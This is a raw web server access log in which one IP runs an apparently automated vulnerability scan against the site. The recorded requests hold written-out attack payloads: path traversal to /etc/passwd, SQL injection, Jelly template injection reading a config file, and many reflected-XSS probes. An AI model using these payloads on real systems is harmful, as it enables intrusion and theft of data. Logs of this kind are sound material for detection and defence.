83.212.98.101 - - [18/Nov/2024:20:12:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [18/Nov/2024:20:15:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [18/Nov/2024:20:17:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [18/Nov/2024:20:20:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [18/Nov/2024:20:22:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [18/Nov/2024:20:25:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [18/Nov/2024:20:27:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [18/Nov/2024:20:30:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [18/Nov/2024:20:32:40 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [18/Nov/2024:20:35:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [18/Nov/2024:20:37:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [18/Nov/2024:20:40:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [18/Nov/2024:20:42:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [18/Nov/2024:20:45:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [18/Nov/2024:20:47:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
111.7.96.178 - - [18/Nov/2024:20:49:11 +0000] GET / HTTP/1.1 200 11204
111.7.96.178 - - [18/Nov/2024:20:49:11 +0000] GET /favicon.ico HTTP/1.1 200 21630
83.212.98.101 - - [18/Nov/2024:20:50:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [18/Nov/2024:20:52:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [18/Nov/2024:20:55:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [18/Nov/2024:20:57:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [18/Nov/2024:21:00:51 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [18/Nov/2024:21:02:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [18/Nov/2024:21:05:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [18/Nov/2024:21:07:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [18/Nov/2024:21:10:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [18/Nov/2024:21:12:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:21:13:08 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:13:31 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:13:50 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:13:52 +0000] PUT /fileserver/2p2W0okn1kyW57BFoqGzJuRg8AH.txt HTTP/1.1 405 1050
195.164.49.69 - - [18/Nov/2024:21:13:52 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:13:53 +0000] POST /invoker/JMXInvokerServlet/ HTTP/1.1 404 1108
195.164.49.69 - - [18/Nov/2024:21:13:54 +0000] PUT /2p2W0goQq3MA14XoQ8WvX0IsofY.jsp/ HTTP/1.1 405 1050
- - - [18/Nov/2024:21:13:55 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:21:13:57 +0000] GET /__ HTTP/1.1 404 1076
195.164.49.69 - - [18/Nov/2024:21:13:59 +0000] POST /integration/saveGangster.action HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:21:14:01 +0000] POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:21:14:02 +0000] POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:21:14:03 +0000] POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1 404 1149
195.164.49.69 - - [18/Nov/2024:21:14:05 +0000] POST /password_change.cgi HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:21:14:07 +0000] POST /account HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:21:14:07 +0000] POST /soap.cgi?service=whatever-control;curl HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:21:14:08 +0000] POST / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:14:09 +0000] POST /_search?pretty HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:21:14:10 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:14:12 +0000] POST /account HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:21:14:13 +0000] GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1148
195.164.49.69 - - [18/Nov/2024:21:14:14 +0000] POST /apply_sec.cgi HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:21:14:15 +0000] GET /solr/admin/cores?wt=json HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:21:14:16 +0000] GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:21:14:17 +0000] GET /fileserver/2p2W0okn1kyW57BFoqGzJuRg8AH.txt HTTP/1.1 404 1120
195.164.49.69 - - [18/Nov/2024:21:14:19 +0000] POST /invoker/EJBInvokerServlet/ HTTP/1.1 404 1108
195.164.49.69 - - [18/Nov/2024:21:14:20 +0000] POST /wls-wsat/CoordinatorPortType HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:21:14:20 +0000] GET /2p2W0goQq3MA14XoQ8WvX0IsofY.jsp HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:21:14:21 +0000] POST /rest/tinymce/1/macro/preview HTTP/1.1 404 1118
195.164.49.69 - - [18/Nov/2024:21:14:22 +0000] POST /node/1?_format=hal_json HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:21:14:23 +0000] POST /service/extdirect HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:14:26 +0000] POST /cgi-bin/supportInstaller HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:21:14:27 +0000] POST /api/timelion/run HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:21:14:28 +0000] POST /Autodiscover/Autodiscover.xml HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:21:14:29 +0000] POST /service/rapture/session HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:21:14:31 +0000] POST /mifs/.;/services/LogService HTTP/1.1 404 1113
195.164.49.69 - - [18/Nov/2024:21:14:35 +0000] POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:21:14:38 +0000] GET /check_browser?lang=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:21:14:40 +0000] GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1156
195.164.49.69 - - [18/Nov/2024:21:14:40 +0000] GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1 404 1152
195.164.49.69 - - [18/Nov/2024:21:14:41 +0000] POST /apply_sec.cgi HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:21:14:43 +0000] GET /Telerik.Web.UI.WebResource.axd?_TSM_CombinedScripts_=;;System.Web.Extensions,%20Version=4.0.0.0,%20Culture=neutral,%20PublicKeyToken=31bf3856ad364e35:de-DE:db3d9eb3-6d72-4959-b303-32b61119a4a8:ea597d4b:b25378d2 HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:21:14:44 +0000] POST /EemAdminService/EemAdmin HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:21:14:45 +0000] POST /invoker/readonly HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:14:45 +0000] POST /wls-wsat/CoordinatorPortType HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:21:14:47 +0000] POST /api/jsonws/invoke HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:21:14:47 +0000] POST /api/jsonws/invoke HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:21:14:49 +0000] POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:21:14:50 +0000] POST /cgi-bin/mainfunction.cgi HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:21:14:53 +0000] GET /images/..%2finfo.html HTTP/1.1 400 1169
195.164.49.69 - - [18/Nov/2024:21:14:55 +0000] POST /casa/nodes/thumbprints HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:21:14:56 +0000] POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1 404 1218
195.164.49.69 - - [18/Nov/2024:21:14:58 +0000] POST /service/rest/beta/repositories/bower/group HTTP/1.1 404 1136
195.164.49.69 - - [18/Nov/2024:21:14:59 +0000] POST /mgmt/shared/authn/login HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:21:15:00 +0000] POST /users/user-dark-features HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:21:15:01 +0000] POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:21:15:01 +0000] POST /pages/createpage-entervariables.action HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:21:15:01 +0000] POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1131
195.164.49.69 - - [18/Nov/2024:21:15:01 +0000] POST /confluence/pages/createpage-entervariables.action HTTP/1.1 404 1131
195.164.49.69 - - [18/Nov/2024:21:15:01 +0000] POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:21:15:01 +0000] POST /wiki/pages/createpage-entervariables.action HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:21:15:01 +0000] POST /pages/doenterpagevariables.action HTTP/1.1 404 1111
195.164.49.69 - - [18/Nov/2024:21:15:01 +0000] POST /pages/createpage.action?spaceKey=myproj HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:21:15:01 +0000] POST /pages/templates2/viewpagetemplate.action HTTP/1.1 404 1122
195.164.49.69 - - [18/Nov/2024:21:15:01 +0000] POST /pages/createpage-entervariables.action HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:21:15:01 +0000] POST /template/custom/content-editor HTTP/1.1 404 1112
195.164.49.69 - - [18/Nov/2024:21:15:01 +0000] POST /templates/editor-preload-container HTTP/1.1 404 1112
195.164.49.69 - - [18/Nov/2024:21:15:15 +0000] POST /wsman HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:21:15:16 +0000] POST /./RestAPI/LogonCustomization HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:21:15:16 +0000] POST /v1/backend1 HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:21:15:18 +0000] GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1160
195.164.49.69 - - [18/Nov/2024:21:15:18 +0000] GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1 404 1152
195.164.49.69 - - [18/Nov/2024:21:15:19 +0000] POST /apply_sec.cgi HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:21:15:21 +0000] GET /client/index.php HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:15:24 +0000] GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:21:15:25 +0000] GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:15:26 +0000] POST /mgmt/tm/util/bash HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:15:34 +0000] POST /dologin.action HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:21:15:35 +0000] POST /api/content/ HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:15:37 +0000] POST /fileupload/toolsAny HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:21:15:40 +0000] POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1 404 1127
195.164.49.69 - - [18/Nov/2024:21:15:41 +0000] GET /login.zul HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:21:15:43 +0000] GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:21:15:43 +0000] POST /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 HTTP/1.1 404 1121
195.164.49.69 - - [18/Nov/2024:21:15:43 +0000] GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:21:15:43 +0000] POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.1 404 1121
195.164.49.69 - - [18/Nov/2024:21:15:46 +0000] POST /./RestAPI/LogonCustomization HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:21:15:47 +0000] GET /v1/2p2W0a9pM9NZy4JkGZwm4WbnWjN.php HTTP/1.1 404 1112
195.164.49.69 - - [18/Nov/2024:21:15:49 +0000] GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1162
195.164.49.69 - - [18/Nov/2024:21:15:49 +0000] GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1 404 1152
195.164.49.69 - - [18/Nov/2024:21:15:50 +0000] GET /api/v2/cmdb/system/admin HTTP/1.1 404 1114
83.212.98.101 - - [18/Nov/2024:21:15:51 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:21:15:52 +0000] POST /aspera/faspex/package_relay/relay_package HTTP/1.1 404 1127
195.164.49.69 - - [18/Nov/2024:21:15:54 +0000] POST /goanywhere/lic/accept HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:15:54 +0000] POST /index.php?c=blocked&action=continue HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:21:15:56 +0000] GET /menu/neo HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:21:15:57 +0000] GET /setup/setupadministrator-start.action HTTP/1.1 404 1115
195.164.49.69 - - [18/Nov/2024:21:16:00 +0000] POST /api/2.0/mlflow/registered-models/create HTTP/1.1 404 1129
195.164.49.69 - - [18/Nov/2024:21:16:31 +0000] GET /2p2W0jtS8jaDh6RLxdmIcBDu3cn.jsp HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:21:16:32 +0000] GET /authenticationendpoint/2p2w0kvguwv9ldrug8w6jqnnkhe.jsp HTTP/1.1 404 1132
195.164.49.69 - - [18/Nov/2024:21:16:34 +0000] GET /app?service=page/SetupCompleted HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:21:16:39 +0000] POST /./RestAPI/Connection HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:21:16:39 +0000] DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1 405 1050
195.164.49.69 - - [18/Nov/2024:21:16:41 +0000] GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1156
195.164.49.69 - - [18/Nov/2024:21:16:42 +0000] GET /hsqldb%0a HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:21:16:43 +0000] PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 405 1050
195.164.49.69 - - [18/Nov/2024:21:16:43 +0000] GET /WebInterface HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:21:16:45 +0000] GET /api/server/version HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:21:16:47 +0000] POST /webtools/control/xmlrpc?USERNAME&PASSWORD=2p2W0i5c4mRwKRGZ1PzHUemUd85&requirePasswordChange=Y HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:21:16:48 +0000] GET /api/clusters HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:21:16:49 +0000] GET /menu/stc HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:21:16:49 +0000] GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache2p2W0iPOlr0sJSB8i14SZMXThDK HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:21:16:50 +0000] GET /wp-content/plugins/backup-backup/readme.txt HTTP/1.1 404 1129
195.164.49.69 - - [18/Nov/2024:21:16:52 +0000] GET /users/sign_in HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:21:16:53 +0000] GET /xyz/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1 404 1143
195.164.49.69 - - [18/Nov/2024:21:16:53 +0000] POST /api/2.0/mlflow/model-versions/create HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:21:17:26 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:21:17:27 +0000] POST /dana-na/auth/saml-sso.cgi HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:21:17:29 +0000] POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1 404 1133
195.164.49.69 - - [18/Nov/2024:21:17:30 +0000] GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1 404 1143
195.164.49.69 - - [18/Nov/2024:21:17:31 +0000] GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:17:32 +0000] GET /help/admin-guide/test.jsp HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:21:17:32 +0000] POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:21:17:35 +0000] GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1157
195.164.49.69 - - [18/Nov/2024:21:17:35 +0000] POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 404 1120
195.164.49.69 - - [18/Nov/2024:21:17:38 +0000] GET /ui/..%5Csrc%5CgetSettings.rsb?@json HTTP/1.1 400 1160
83.212.98.101 - - [18/Nov/2024:21:17:40 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:21:17:42 +0000] GET /setup/setupadministrator-start.action HTTP/1.1 404 1115
195.164.49.69 - - [18/Nov/2024:21:17:44 +0000] GET /en-US/login HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:21:18:18 +0000] POST /Startup/Register HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:18:19 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:21:18:20 +0000] GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:21:18:22 +0000] POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1 404 1124
195.164.49.69 - - [18/Nov/2024:21:18:23 +0000] POST /apps/zxtm/wizard.fcgi?error=1§ion=Access+Management%3ALocalUsers HTTP/1.1 404 1103
- - - [18/Nov/2024:21:18:24 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:21:18:27 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:18:27 +0000] POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1 404 1121
195.164.49.69 - - [18/Nov/2024:21:18:28 +0000] GET /logs/errors HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:21:18:30 +0000] GET /roundcube/logs/sendmail HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:21:18:31 +0000] GET /roundcube/logs/errors.log HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:21:18:31 +0000] GET /roundcube/logs/errors HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:18:31 +0000] GET /webmail/logs/sendmail HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:18:31 +0000] GET /webmail/logs/sendmail.log HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:21:18:31 +0000] GET /webmail/logs/errors.log HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:21:18:31 +0000] GET /webmail/logs/errors HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:21:18:31 +0000] GET /mail/logs/sendmail HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:21:18:31 +0000] GET /mail/logs/sendmail.log HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:21:18:33 +0000] GET /roundcube/logs/sendmail.log HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:21:18:34 +0000] GET /mail/logs/errors.log HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:21:18:34 +0000] GET /mail/logs/errors HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:21:18:34 +0000] GET /logs/sendmail HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:21:18:34 +0000] GET /logs/sendmail.log HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:18:34 +0000] GET /logs/errors.log HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:21:18:44 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:18:50 +0000] GET /?send=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-send%27%29%3E&attachment_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment_id%27%29%3E&wp_screen_options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-wp_screen_options%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page_id%27%29%3E&locale=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-locale%27%29%3E&function=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-function%27%29%3E&profile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-profile%27%29%3E&day=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-day%27%29%3E&folder=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-folder%27%29%3E&mobile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mobile%27%29%3E&settings=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings%27%29%3E&comments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comments%27%29%3E&all=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-all%27%29%3E&menu=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:18:53 +0000] GET /?edit-menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit-menu-item%27%29%3E&error=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-error%27%29%3E&post_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_title%27%29%3E&x=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-x%27%29%3E&down=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-down%27%29%3E&state=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-state%27%29%3E&data=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-data%27%29%3E&auth=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-auth%27%29%3E&themes=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-themes%27%29%3E&captcha=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-captcha%27%29%3E&nickname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nickname%27%29%3E&allusers=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-allusers%27%29%3E&color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-color%27%29%3E&path=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-path%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:18:53 +0000] GET /?uname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uname%27%29%3E&command=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-command%27%29%3E&reverse=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reverse%27%29%3E&cancel=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cancel%27%29%3E&h=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-h%27%29%3E&logout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-logout%27%29%3E§ion=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-section%27%29%3E&gid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gid%27%29%3E&input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-input%27%29%3E&post_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_type%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page%27%29%3E&updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-updated%27%29%3E&charset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-charset%27%29%3E&v=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-v%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:18:53 +0000] GET /?t=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-t%27%29%3E&comment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment%27%29%3E&post_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_id%27%29%3E&postid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-postid%27%29%3E&config=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-config%27%29%3E&login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-login%27%29%3E&paged=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-paged%27%29%3E&go=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-go%27%29%3E&tag_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag_ID%27%29%3E&user_login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_login%27%29%3E&part=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-part%27%29%3E&preview_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_id%27%29%3E&_ajax_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_ajax_nonce%27%29%3E&widget-id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget-id%27%29%3E HTTP/1.1 200 11204
